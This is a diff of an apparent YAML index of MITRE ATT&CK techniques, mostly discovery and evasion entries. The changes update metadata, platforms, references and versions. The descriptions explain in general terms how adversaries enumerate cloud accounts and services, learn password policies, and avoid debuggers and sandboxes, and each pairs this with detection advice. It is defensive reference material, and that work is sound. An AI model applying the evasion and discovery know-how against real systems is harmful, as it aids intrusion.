-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1087.004
-        url: https://attack.mitre.org/techniques/T1087/004
-      - description: Microsoft. (n.d.). Get-MsolRoleMember. Retrieved October 6, 2019.
-        url: https://docs.microsoft.com/en-us/powershell/module/msonline/get-msolrolemember?view=azureadps-1.0
-        source_name: Microsoft msolrolemember
-      - description: Stringer, M.. (2018, November 21). RainDance. Retrieved October
-          6, 2019.
-        url: https://github.com/True-Demon/raindance
-        source_name: GitHub Raindance
-      - description: Microsoft. (n.d.). az ad user. Retrieved October 6, 2019.
-        url: https://docs.microsoft.com/en-us/cli/azure/ad/user?view=azure-cli-latest
-        source_name: Microsoft AZ CLI
-      - description: Felch, M.. (2018, August 31). Red Teaming Microsoft Part 1 Active
-          Directory Leaks via Azure. Retrieved October 6, 2019.
-        url: https://www.blackhillsinfosec.com/red-teaming-microsoft-part-1-active-directory-leaks-via-azure/
-        source_name: Black Hills Red Teaming MS AD Azure, 2018
-      - source_name: AWS List Roles
-        description: Amazon. (n.d.). List Roles. Retrieved August 11, 2020.
-        url: https://docs.aws.amazon.com/cli/latest/reference/iam/list-roles.html
-      - source_name: AWS List Users
-        url: https://docs.aws.amazon.com/cli/latest/reference/iam/list-users.html
-        description: Amazon. (n.d.). List Users. Retrieved August 11, 2020.
-      - source_name: Google Cloud - IAM Servie Accounts List API
-        url: https://cloud.google.com/sdk/gcloud/reference/iam/service-accounts/list
-        description: Google. (2020, June 23). gcloud iam service-accounts list. Retrieved
-          August 4, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-10-15T15:51:18.808Z'
       name: Cloud Account
       description: "Adversaries may attempt to get a listing of cloud accounts. Cloud
         accounts are those created and configured by an organization for use by users,
@@ -50862,19 +51511,61 @@ discovery:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: discovery
+      x_mitre_contributors:
+      - Praetorian
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor processes, command-line arguments, and logs for actions that could be taken to gather information about cloud accounts, including the use of calls to cloud APIs that perform account discovery.
 
         System and network discovery techniques normally occur throughout an operation as an adversary learns the environment, and also to an extent in normal network operations. Therefore discovery data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.2'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - SaaS
+      - IaaS
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'Command: Command Execution'
-      x_mitre_permissions_required:
-      - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--8f104855-e5b7-4077-b1f5-bc3103b41abe
+      created: '2020-02-21T21:08:36.570Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1087/004
+        external_id: T1087.004
+      - source_name: AWS List Roles
+        description: Amazon. (n.d.). List Roles. Retrieved August 11, 2020.
+        url: https://docs.aws.amazon.com/cli/latest/reference/iam/list-roles.html
+      - source_name: AWS List Users
+        description: Amazon. (n.d.). List Users. Retrieved August 11, 2020.
+        url: https://docs.aws.amazon.com/cli/latest/reference/iam/list-users.html
+      - source_name: Black Hills Red Teaming MS AD Azure, 2018
+        description: Felch, M.. (2018, August 31). Red Teaming Microsoft Part 1 Active
+          Directory Leaks via Azure. Retrieved October 6, 2019.
+        url: https://www.blackhillsinfosec.com/red-teaming-microsoft-part-1-active-directory-leaks-via-azure/
+      - source_name: Google Cloud - IAM Servie Accounts List API
+        description: Google. (2020, June 23). gcloud iam service-accounts list. Retrieved
+          August 4, 2020.
+        url: https://cloud.google.com/sdk/gcloud/reference/iam/service-accounts/list
+      - source_name: Microsoft AZ CLI
+        description: Microsoft. (n.d.). az ad user. Retrieved October 6, 2019.
+        url: https://docs.microsoft.com/en-us/cli/azure/ad/user?view=azure-cli-latest
+      - source_name: Microsoft msolrolemember
+        description: Microsoft. (n.d.). Get-MsolRoleMember. Retrieved October 6, 2019.
+        url: https://docs.microsoft.com/en-us/powershell/module/msonline/get-msolrolemember?view=azureadps-1.0
+      - source_name: GitHub Raindance
+        description: Stringer, M.. (2018, November 21). RainDance. Retrieved October
+          6, 2019.
+        url: https://github.com/True-Demon/raindance
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1057:
     technique:
@@ -50945,46 +51636,11 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1057
     atomic_tests: []
   T1497.002:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Deloitte Threat Library Team
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--91541e7e-b969-40c6-bbd8-1b5352ec2938
-      type: attack-pattern
-      created: '2020-03-06T21:04:12.454Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1497.002
-        url: https://attack.mitre.org/techniques/T1497/002
-      - source_name: Deloitte Environment Awareness
-        url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc
-        description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
-          May 18, 2021.
-      - source_name: Sans Virtual Jan 2016
-        url: https://www.sans.org/reading-room/whitepapers/forensics/detecting-malware-sandbox-evasion-techniques-36667
-        description: Keragala, D. (2016, January 16). Detecting Malware and Sandbox
-          Evasion Techniques. Retrieved April 17, 2019.
-      - source_name: Unit 42 Sofacy Nov 2018
-        url: https://unit42.paloaltonetworks.com/unit42-sofacy-continues-global-attacks-wheels-new-cannon-trojan/
-        description: Falcone, R., Lee, B.. (2018, November 20). Sofacy Continues Global
-          Attacks and Wheels Out New ‘Cannon’ Trojan. Retrieved April 23, 2019.
-      - url: https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html
-        description: Carr, N., et al. (2017, April 24). FIN7 Evolution and the Phishing
-          LNK. Retrieved April 24, 2017.
-        source_name: FireEye FIN7 April 2017
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-09-12T15:50:18.050Z'
       name: User Activity Based Checks
       description: "Adversaries may employ various user activity checks to detect
         and avoid virtualization and analysis environments. This may include changing
@@ -51008,6 +51664,9 @@ discovery:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: discovery
+      x_mitre_contributors:
+      - Deloitte Threat Library Team
+      x_mitre_deprecated: false
       x_mitre_detection: 'User activity-based checks will likely occur in the first
         steps of an operation but may also occur throughout as an adversary learns
         the environment. Data and events should not be viewed in isolation, but as
@@ -51018,9 +51677,14 @@ discovery:
         processes being spawned that gather a variety of system information or perform
         other forms of Discovery, especially in a short period of time, may aid in
         detection. '
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      - Windows
       x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Process: OS API Execution'
       - 'Process: Process Creation'
@@ -51030,12 +51694,39 @@ discovery:
       - Static File Analysis
       - Signature-based detection
       - Host forensic analysis
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--91541e7e-b969-40c6-bbd8-1b5352ec2938
+      created: '2020-03-06T21:04:12.454Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1497/002
+        external_id: T1497.002
+      - source_name: FireEye FIN7 April 2017
+        description: Carr, N., et al. (2017, April 24). FIN7 Evolution and the Phishing
+          LNK. Retrieved April 24, 2017.
+        url: https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html
+      - source_name: Unit 42 Sofacy Nov 2018
+        description: Falcone, R., Lee, B.. (2018, November 20). Sofacy Continues Global
+          Attacks and Wheels Out New ‘Cannon’ Trojan. Retrieved April 23, 2019.
+        url: https://unit42.paloaltonetworks.com/unit42-sofacy-continues-global-attacks-wheels-new-cannon-trojan/
+      - source_name: Sans Virtual Jan 2016
+        description: Keragala, D. (2016, January 16). Detecting Malware and Sandbox
+          Evasion Techniques. Retrieved April 17, 2019.
+        url: https://www.sans.org/reading-room/whitepapers/forensics/detecting-malware-sandbox-evasion-techniques-36667
+      - source_name: Deloitte Environment Awareness
+        description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
+          September 13, 2024.
+        url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc/edit
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1069.001:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-07T17:14:42.184Z'
       name: 'Permission Groups Discovery: Local Groups'
       description: |-
         Adversaries may attempt to find local system groups and permission settings. The knowledge of local system permission groups can help adversaries determine which groups exist and which users belong to a particular group. Adversaries may use this information to determine which users have elevated permissions, such as the users found within the local administrators group.
@@ -51078,7 +51769,6 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1069.001
     atomic_tests:
     - name: Permission Groups Discovery for Containers- Local Groups
@@ -51120,7 +51810,7 @@ discovery:
         name: sh
   T1201:
     technique:
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2024-10-15T16:02:44.477Z'
       name: Password Policy Discovery
       description: |-
         Adversaries may attempt to access detailed information about the password policy used within an enterprise network or cloud environment. Password policies are a way to enforce complex passwords that are difficult to guess or crack through [Brute Force](https://attack.mitre.org/techniques/T1110). This information may help the adversary to create a list of common passwords and launch dictionary and/or brute force attacks which adheres to the policy (e.g. if the minimum password length should be 8, then not trying passwords such as 'pass123'; not checking for more than 3-4 passwords per account if the lockout is set to 6 as to not lock out accounts).
@@ -51131,28 +51821,31 @@ discovery:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: discovery
+      x_mitre_contributors:
+      - Regina Elwell
+      - Sudhanshu Chauhan, @Sudhanshu_C
+      - Isif Ibrahima, Mandiant
+      - Austin Clark, @c2defense
+      x_mitre_deprecated: false
       x_mitre_detection: Monitor logs and processes for tools and command line arguments
         that may indicate they're being used for password policy discovery. Correlate
         that activity with other suspicious activity from the originating system to
         reduce potential false positives from valid user or administrator activity.
         Adversaries will likely attempt to find the password policy early in an operation
         and the activity is likely to happen with other Discovery activity.
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: false
       x_mitre_platforms:
       - Windows
       - Linux
       - macOS
       - IaaS
       - Network
-      x_mitre_is_subtechnique: false
-      x_mitre_deprecated: false
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_version: '1.5'
-      x_mitre_contributors:
-      - Regina Elwell
-      - Sudhanshu Chauhan, @Sudhanshu_C
-      - Isif Ibrahima, Mandiant
-      - Austin Clark, @c2defense
+      - Identity Provider
+      - SaaS
+      - Office Suite
+      x_mitre_version: '1.6'
       x_mitre_data_sources:
       - 'User Account: User Account Metadata'
       - 'Command: Command Execution'
@@ -51185,9 +51878,8 @@ discovery:
         url: https://www.us-cert.gov/ncas/alerts/TA18-106A
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1201
     atomic_tests: []
   T1614.001:
@@ -51230,7 +51922,7 @@ discovery:
         description: Ivanov, A. et al. (2018, May 7). SynAck targeted ransomware uses
           the Doppelgänging technique. Retrieved May 22, 2018.
         url: https://securelist.com/synack-targeted-ransomware-uses-the-doppelganging-technique/85431/
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-15T22:00:56.174Z'
       name: 'System Location Discovery: System Language Discovery'
       description: "Adversaries may attempt to gather information about the system
         language of a victim in order to infer the geographical location of that host.
@@ -51269,13 +51961,11 @@ discovery:
       - 'Command: Command Execution'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1614.001
     atomic_tests: []
   T1012:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-03T18:56:37.011Z'
       name: Query Registry
       description: |-
         Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
@@ -51316,87 +52006,85 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1012
     atomic_tests: []
   T1614:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - Linux
-      - macOS
-      - IaaS
-      x_mitre_domains:
-      - enterprise-attack
+      modified: '2024-10-15T16:07:23.511Z'
+      name: System Location Discovery
+      description: |2-
+
+        Adversaries may gather information in an attempt to calculate the geographical location of a victim host. Adversaries may use the information from [System Location Discovery](https://attack.mitre.org/techniques/T1614) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
+
+        Adversaries may attempt to infer the location of a system using various system checks, such as time zone, keyboard layout, and/or language settings.(Citation: FBI Ragnar Locker 2020)(Citation: Sophos Geolocation 2016)(Citation: Bleepingcomputer RAT malware 2020) Windows API functions such as <code>GetLocaleInfoW</code> can also be used to determine the locale of the host.(Citation: FBI Ragnar Locker 2020) In cloud environments, an instance's availability zone may also be discovered by accessing the instance metadata service from the instance.(Citation: AWS Instance Identity Documents)(Citation: Microsoft Azure Instance Metadata 2021)
+
+        Adversaries may also attempt to infer the location of a victim host using IP addressing, such as via online geolocation IP-lookup services.(Citation: Securelist Trasparent Tribe 2020)(Citation: Sophos Geolocation 2016)
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: discovery
       x_mitre_contributors:
       - Pooja Natarajan, NEC Corporation India
       - Hiroki Nagahama, NEC Corporation
       - Manikantan Srinivasan, NEC Corporation India
       - Wes Hurd
       - Katie Nickels, Red Canary
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--c877e33f-1df6-40d6-b1e7-ce70f16f4979
+      x_mitre_deprecated: false
+      x_mitre_detection: |-
+        System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities based on the information obtained.
+
+        Monitor processes and command-line arguments for actions that could be taken to gather system location information. Remote access tools with built-in features may interact directly with the Windows API, such as calling <code> GetLocaleInfoW</code> to gather information.(Citation: FBI Ragnar Locker 2020)
+
+        Monitor traffic flows to geo-location service provider sites, such as ip-api and ipinfo.
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - Windows
+      - Linux
+      - macOS
+      - IaaS
+      x_mitre_version: '1.1'
+      x_mitre_data_sources:
+      - 'Process: Process Creation'
+      - 'Process: OS API Execution'
+      - 'Command: Command Execution'
       type: attack-pattern
+      id: attack-pattern--c877e33f-1df6-40d6-b1e7-ce70f16f4979
       created: '2021-04-01T16:42:08.735Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1614
         url: https://attack.mitre.org/techniques/T1614
-      - source_name: FBI Ragnar Locker 2020
-        url: https://assets.documentcloud.org/documents/20413525/fbi-flash-indicators-of-compromise-ragnar-locker-ransomware-11192020-bc.pdf
-        description: FBI. (2020, November 19). Indicators of Compromise Associated
-          with Ragnar Locker Ransomware. Retrieved April 1, 2021.
-      - source_name: Sophos Geolocation 2016
-        url: https://news.sophos.com/en-us/2016/05/03/location-based-ransomware-threat-research/
-        description: 'Wisniewski, C. (2016, May 3). Location-based threats: How cybercriminals
-          target you based on where you live. Retrieved April 1, 2021.'
+        external_id: T1614
       - source_name: Bleepingcomputer RAT malware 2020
-        url: https://www.bleepingcomputer.com/news/security/new-rat-malware-gets-commands-via-discord-has-ransomware-feature/
         description: Abrams, L. (2020, October 23). New RAT malware gets commands
           via Discord, has ransomware feature. Retrieved April 1, 2021.
+        url: https://www.bleepingcomputer.com/news/security/new-rat-malware-gets-commands-via-discord-has-ransomware-feature/
       - source_name: AWS Instance Identity Documents
-        url: https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/instance-identity-documents.html
         description: Amazon. (n.d.). Instance identity documents. Retrieved April
           2, 2021.
-      - source_name: Microsoft Azure Instance Metadata 2021
-        url: https://docs.microsoft.com/en-us/azure/virtual-machines/windows/instance-metadata-service?tabs=windows
-        description: Microsoft. (2021, February 21). Azure Instance Metadata Service
-          (Windows). Retrieved April 2, 2021.
+        url: https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/instance-identity-documents.html
       - source_name: Securelist Trasparent Tribe 2020
-        url: https://securelist.com/transparent-tribe-part-1/98127/
         description: 'Dedola, G. (2020, August 20). Transparent Tribe: Evolution analysis,
           part 1. Retrieved April 1, 2021.'
-      modified: '2022-04-25T14:00:00.188Z'
-      name: System Location Discovery
-      description: |2-
-
-        Adversaries may gather information in an attempt to calculate the geographical location of a victim host. Adversaries may use the information from [System Location Discovery](https://attack.mitre.org/techniques/T1614) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
-
-        Adversaries may attempt to infer the location of a system using various system checks, such as time zone, keyboard layout, and/or language settings.(Citation: FBI Ragnar Locker 2020)(Citation: Sophos Geolocation 2016)(Citation: Bleepingcomputer RAT malware 2020) Windows API functions such as <code>GetLocaleInfoW</code> can also be used to determine the locale of the host.(Citation: FBI Ragnar Locker 2020) In cloud environments, an instance's availability zone may also be discovered by accessing the instance metadata service from the instance.(Citation: AWS Instance Identity Documents)(Citation: Microsoft Azure Instance Metadata 2021)
-
-        Adversaries may also attempt to infer the location of a victim host using IP addressing, such as via online geolocation IP-lookup services.(Citation: Securelist Trasparent Tribe 2020)(Citation: Sophos Geolocation 2016)
-      kill_chain_phases:
-      - kill_chain_name: mitre-attack
-        phase_name: discovery
-      x_mitre_detection: |-
-        System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities based on the information obtained.
-
-        Monitor processes and command-line arguments for actions that could be taken to gather system location information. Remote access tools with built-in features may interact directly with the Windows API, such as calling <code> GetLocaleInfoW</code> to gather information.(Citation: FBI Ragnar Locker 2020)
-
-        Monitor traffic flows to geo-location service provider sites, such as ip-api and ipinfo.
-      x_mitre_version: '1.0'
+        url: https://securelist.com/transparent-tribe-part-1/98127/
+      - source_name: FBI Ragnar Locker 2020
+        description: FBI. (2020, November 19). Indicators of Compromise Associated
+          with Ragnar Locker Ransomware. Retrieved September 12, 2024.
+        url: https://s3.documentcloud.org/documents/20413525/fbi-flash-indicators-of-compromise-ragnar-locker-ransomware-11192020-bc.pdf
+      - source_name: Microsoft Azure Instance Metadata 2021
+        description: Microsoft. (2021, February 21). Azure Instance Metadata Service
+          (Windows). Retrieved April 2, 2021.
+        url: https://docs.microsoft.com/en-us/azure/virtual-machines/windows/instance-metadata-service?tabs=windows
+      - source_name: Sophos Geolocation 2016
+        description: 'Wisniewski, C. (2016, May 3). Location-based threats: How cybercriminals
+          target you based on where you live. Retrieved April 1, 2021.'
+        url: https://news.sophos.com/en-us/2016/05/03/location-based-ransomware-threat-research/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      x_mitre_data_sources:
-      - 'Process: Process Creation'
-      - 'Process: OS API Execution'
-      - 'Command: Command Execution'
-      x_mitre_permissions_required:
-      - User
-      x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1614
     atomic_tests: []
   T1518.001:
@@ -51449,17 +52137,16 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1518.001
     atomic_tests: []
   T1526:
     technique:
-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Cloud Service Discovery
       description: |-
-        An adversary may attempt to enumerate the cloud services running on a system after gaining access. These methods can differ from platform-as-a-service (PaaS), to infrastructure-as-a-service (IaaS), or software-as-a-service (SaaS). Many services exist throughout the various cloud providers and can include Continuous Integration and Continuous Delivery (CI/CD), Lambda Functions, Azure AD, etc. They may also include security services, such as AWS GuardDuty and Microsoft Defender for Cloud, and logging services, such as AWS CloudTrail and Google Cloud Audit Logs.
+        An adversary may attempt to enumerate the cloud services running on a system after gaining access. These methods can differ from platform-as-a-service (PaaS), to infrastructure-as-a-service (IaaS), or software-as-a-service (SaaS). Many services exist throughout the various cloud providers and can include Continuous Integration and Continuous Delivery (CI/CD), Lambda Functions, Entra ID, etc. They may also include security services, such as AWS GuardDuty and Microsoft Defender for Cloud, and logging services, such as AWS CloudTrail and Google Cloud Audit Logs.
 
-        Adversaries may attempt to discover information about the services enabled throughout the environment. Azure tools and APIs, such as the Azure AD Graph API and Azure Resource Manager API, can enumerate resources and services, including applications, management groups, resources and policy definitions, and their relationships that are accessible by an identity.(Citation: Azure - Resource Manager API)(Citation: Azure AD Graph API)
+        Adversaries may attempt to discover information about the services enabled throughout the environment. Azure tools and APIs, such as the Microsoft Graph API and Azure Resource Manager API, can enumerate resources and services, including applications, management groups, resources and policy definitions, and their relationships that are accessible by an identity.(Citation: Azure - Resource Manager API)(Citation: Azure AD Graph API)
 
         For example, Stormspotter is an open source tool for enumerating and constructing a graph for Azure resources and services, and Pacu is an open source AWS exploitation framework that supports several methods for discovering cloud services.(Citation: Azure - Stormspotter)(Citation: GitHub Pacu)
 
@@ -51467,10 +52154,12 @@ discovery:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: discovery
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Suzy Schapperle - Microsoft Azure Red Team
       - Praetorian
       - Thanabodi Phrakhun, I-SECURE
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: |-
         Cloud service discovery techniques will likely occur throughout an operation where an adversary is targeting cloud-based systems and services. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities based on the information obtained.
@@ -51479,15 +52168,16 @@ discovery:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
-      - Google Workspace
-      x_mitre_version: '1.3'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Cloud Service: Cloud Service Enumeration'
+      - 'Logon Session: Logon Session Creation'
       type: attack-pattern
       id: attack-pattern--e24fcba8-2557-4442-a139-1ee2f2e784db
       created: '2019-08-30T13:01:10.120Z'
@@ -51515,9 +52205,6 @@ discovery:
         url: https://github.com/RhinoSecurityLabs/pacu
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1526
     atomic_tests: []
   T1018:
@@ -51592,7 +52279,6 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1018
     atomic_tests: []
   T1046:
@@ -51664,7 +52350,6 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1046
     atomic_tests:
     - name: Network Service Discovery for Containers
@@ -51750,12 +52435,11 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1518
     atomic_tests: []
   T1538:
     technique:
-      modified: '2024-04-19T04:25:33.300Z'
+      modified: '2024-10-15T15:51:56.279Z'
       name: Cloud Service Dashboard
       description: |-
         An adversary may use a cloud service dashboard GUI with stolen credentials to gain useful information from an operational cloud environment, such as specific services, resources, and features. For example, the GCP Command Center can be used to view all assets, findings of potential security risks, and to run additional queries, such as finding public IP addresses and open ports.(Citation: Google Command Center Dashboard)
@@ -51776,12 +52460,11 @@ discovery:
       - enterprise-attack
       x_mitre_is_subtechnique: false
       x_mitre_platforms:
-      - Azure AD
-      - Office 365
       - IaaS
-      - Google Workspace
       - SaaS
-      x_mitre_version: '1.3'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       - 'User Account: User Account Authentication'
@@ -51806,7 +52489,6 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1622:
     technique:
@@ -51861,7 +52543,7 @@ discovery:
         Specific checks will vary based on the target and/or adversary, but may involve [Native API](https://attack.mitre.org/techniques/T1106) function calls such as <code>IsDebuggerPresent()</code> and <code> NtQueryInformationProcess()</code>, or manually checking the <code>BeingDebugged</code> flag of the Process Environment Block (PEB). Other checks for debugging artifacts may also seek to enumerate hardware breakpoints, interrupt assembly opcodes, time checks, or measurements if exceptions are raised in the current process (assuming a present debugger would “swallow” or handle the potential error).(Citation: hasherezade debug)(Citation: AlKhaser Debug)(Citation: vxunderground debug)
 
         Adversaries may use the information learned from these debugger checks during automated discovery to shape follow-on behaviors. Debuggers can also be evaded by detaching the process or flooding debug logs with meaningless data via messages produced by looping [Native API](https://attack.mitre.org/techniques/T1106) function calls such as <code>OutputDebugStringW()</code>.(Citation: wardle evilquest partii)(Citation: Checkpoint Dridex Jan 2021)
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-16T15:05:55.918Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Debugger Evasion
       x_mitre_detection: |-
@@ -51881,7 +52563,6 @@ discovery:
       - 'Command: Command Execution'
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1622
     atomic_tests: []
   T1124:
@@ -51984,13 +52665,12 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1124
     atomic_tests: []
 resource-development:
   T1583:
     technique:
-      modified: '2024-02-28T21:13:02.648Z'
+      modified: '2024-10-16T20:03:59.884Z'
       name: Acquire Infrastructure
       description: |-
         Adversaries may buy, lease, rent, or obtain infrastructure that can be used during targeting. A wide variety of infrastructure exists for hosting and orchestrating adversary operations. Infrastructure solutions include physical or cloud servers, domains, and third-party web services.(Citation: TrendmicroHideoutsLease) Some infrastructure providers offer free trial periods, enabling infrastructure acquisition at limited to no cost.(Citation: Free Trial PurpleUrchin) Additionally, botnets are available for rent or purchase.
@@ -52001,7 +52681,7 @@ resource-development:
         phase_name: resource-development
       x_mitre_contributors:
       - Shailesh Tiwary (Indian Army)
-      - Goldstein Menachem
+      - Menachem Goldstein
       x_mitre_deprecated: false
       x_mitre_detection: "Consider use of services that may aid in tracking of newly
